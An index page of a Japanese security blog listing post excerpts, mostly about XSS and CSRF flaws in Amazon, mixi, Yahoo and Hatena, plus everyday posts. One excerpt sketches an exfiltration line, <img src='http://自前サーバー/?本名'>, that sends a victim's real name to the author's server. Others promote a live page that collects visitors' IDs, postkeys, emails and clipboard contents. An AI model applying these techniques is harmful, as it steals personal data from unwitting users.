はまちや2さんの日記 カテゴリ[ぼくはまちちゃん!]

XSS - 表示系パラメータに存在する盲点

こんにちはこんにちは!!
クロスサイトスクリプティングの時間です!

XSSというと…!
まっさきに思いつくのが、入力データ送信 → 確認表示の部分での無害化漏れですよね!

たとえばこんな感じのフォームから受け取ったパラメータを、
確認として表示するページとか!

続きはこちら   [コメント:3件 トラックバック:4件]

.go.jp からのアクセス気持ち悪い><

soumu.go.jp とか><

なので、 .htaccess (とか httpd.conf) で

RewriteEngine on
RewriteCond %{REMOTE_HOST} \.go\.jp$ [NC]
RewriteCond %{REQUEST_URI} !^/404.html
RewriteRule .* http://hamachiya.com/404.html [L,R]

ってしてみたよ!

続きはこちら   [コメント:3件 トラックバック:1件]

本名吸い取り機をわかりやすく

むだに gifアニメとかつけてみたら、ちょっとかっこよくなったかも!

本名吸い取り機 (AMAZON XSS)

続きはこちら   [コメント:0件 トラックバック:0件]

本名吸い取り機 (AMAZON XSS)

↓これ

超おすすめマンガなんです!!! うそだけど! ( 修正がはいりました。もう動きません )

取得後 alert のかわりに、自前で用意したサーバーに <img src="http://自前サーバー/?本名"> かなんかでリクエストするようにしといて、その後、適当な書籍にリダイレクトさせたりすれば…!

本名吸い取り機のできあがり!

続きはこちら   [コメント:6件 トラックバック:3件]

超mixi足あとちょうについて

こんにちはこんにちは!!

現在の超mixi足あとちょうは、何度かのバージョンアップをして、以下のような内容になってますよ!

きみのMIXI ID:
きみのpostkey:
きみのメールアドレス: ※mixiの修正が4回入って、現在は非表示
きみのブラウザ:
きみのホスト名:
リンク元:
(おまけ4) きみのYahoo ID:
(おまけ5) きみのHatena ID:
(おまけ2) きみのlivedoor ID:
(おまけ6) きみのGoogleアカウント:
(おまけ3) きみのなまえ(amazon):
(おまけ7) きみの好みのタイプ:
(おまけ1) きみのクリップボードの中身

ところで、超mixi足あとちょうの追記にも書いたけれど、
「hamachiya.com を見にいかなければ大丈夫」
思考停止するのって一番危険なんじゃないかな、と思うんだけど…!

続きはこちら   [コメント:9件 トラックバック:0件]

mhtmlのセキュリティホール

mhtmlスキーム?っていうのを使った時に JISだか SJISだかにエンコードされちゃうのかな?

なんだかよくわからないけど EUC のサイトの日本語部分はうまくできそうにないや><
だけど、amazon みたいな SJIS のサイトはやばいのかもしれないね。

↓おまけコーナーで amazon じっけんちゅうだよ。ちゃんとうごくかな。
http://hamachiya.com/junk/getmixi.html

続きはこちら   [コメント:2件 トラックバック:0件]

超mixi足あとちょうのメールアドレスが表示されなくなったので

超mixi足あとちょうも Ver.2 になりました><
ちゃんとメール表示されるようになおしておいたよ!
http://hamachiya.com/junk/getmixi.html

※ http://mixi.jp/edit_account.pl の修正が入ったもよう (登録アドレスが非表示になった)
(参考)
http://d.hatena.ne.jp/the-next/20060429/1146330985

続きはこちら   [コメント:0件 トラックバック:0件]

なんか足あとちょうが動かなくなってる><

mixiのやつじゃなくて、cssxssでyahooとかはてなのid表示するやつのほうなんだけど!

windows updateのせい?

続きはこちら   [コメント:0件 トラックバック:0件]

Googlecloudで巨大な文字をつくってみる

[観] Googlecloud が「叫び」の場になっている件 を見て、ぼくも Googlecloud をやってみた!

2分くらい遊んで飽きて、巨大文字のつくりかたを考えてみたよ!

続きはこちら   [コメント:1件 トラックバック:1件]

CSRF対策

「旅行びと日記」日記: CSRF対策
トラックバックしちゃうよ!

はまちちゃんとかCSRF対策には、パーソナルバー上にログアウトを置いておけば、いつでもどこでも(?)「あ、忘れてた」って時にもすぐログアウトできて、安心安心。
お守り代わりにどうぞ。

もっと良い方法があるよね…?

続きはこちら   [コメント:0件 トラックバック:0件]

最速RSS

最速さまRSSリーダー(Bloglines) にぼくのサイトが登録されてたよ!
うわーぼく緊張しちゃうよ!!

続きはこちら   [コメント:0件 トラックバック:0件]

いま話題のナニエモンの衝撃映像

 
http://www.geocities.jp/hamachiya2/naniemon.wmv (18MB)


どう見てもホモ動画です。閲覧注意(精神有害)。

※我が家のポエム専用機に落っこちてきてたキャッシュファイルより。
  ご丁寧に名前まで捏造されていたよ…!

続きはこちら   [コメント:2件 トラックバック:0件]

Yahoo! Bookmarksは画期的な便利さだ!!!

ぼく普段からYahooなんて、せいぜい天気とか、たまにヤフオク見に行ったりするくらいで、
実はあまり知らなかったんだよ。

で、昨日 CSSXSSでYahoo!IDゲット みたいなこと書いたし、
他にどんなサービスがあるのかなぁと思って、ちょっと見にいってみたんだ。

そしたら「Yahoo! Bookmarks」なんてサービスがあるじゃん!
さっそく使ってみたよ!!

うわなにこれ画期的!!!! やふー天才!?!?!?!?!

続きはこちら   [コメント:5件 トラックバック:0件]

Googleの求人を翻訳してみる

といってもぼく英語と毛虫が死んぢゃうくらい苦手なんで
Google翻訳とExcite翻訳をつかうんだけどね!

続きはこちら   [コメント:1件 トラックバック:0件]

ヨドバシとかビックのポイントの使い方

 
ポイントは貯めるより、毎回使い切るほうがお得 (したらば元社長日記)

↑こちらの記事を見て、以前、友人と話したことを思い出した。

友人曰く「ポイントを小物とかにすぐ使っちゃうのってばかだろ」

ぼく「え、なんで?」

友人「貯めていけばいつの間にかでかいものがタダで買えるのに」

続きはこちら   [コメント:9件

いろんなGoogle

 

そうだ。これを見ればよかったんだ。

続きはこちら   [コメント:7件 トラックバック:0件]

思い出の日記 [ノトさんの絵]

ぼくの友人のはまちや(1)くんが、
むかしミクシィで書いていた日記を無断で公開しちゃうよ!


かつて、はまちや君がミクシィをはじめて間もない頃、
とてもクオリティの高い人とマイミクになったのさ。

その人の名はノトさん。

ある時、マイミクの誰かが絵を描いてうpしていたのを見て
はまちや君も描いてみた。
ノトさんの絵を。
想像で…!

続きはこちら   [コメント:6件 トラックバック:0件]

できた!

ちょっとずつでも色んな機能をつけたせていけたらいいな!

続きはこちら   [コメント:17件 トラックバック:1件]

3こめだよ

これは本文!
どうみても本文です!

続きはこちら   [コメント:4件 トラックバック:2件]

2こめのメモ

はいはい なすなす

続きはこちら   [コメント:2件 トラックバック:0件]

めもちょう。

これはぼくのめもだ。
いま改行した。だからこれは2行目!

続きはこちら   [コメント:3件


Powered by BEARS SERVER PROJECT.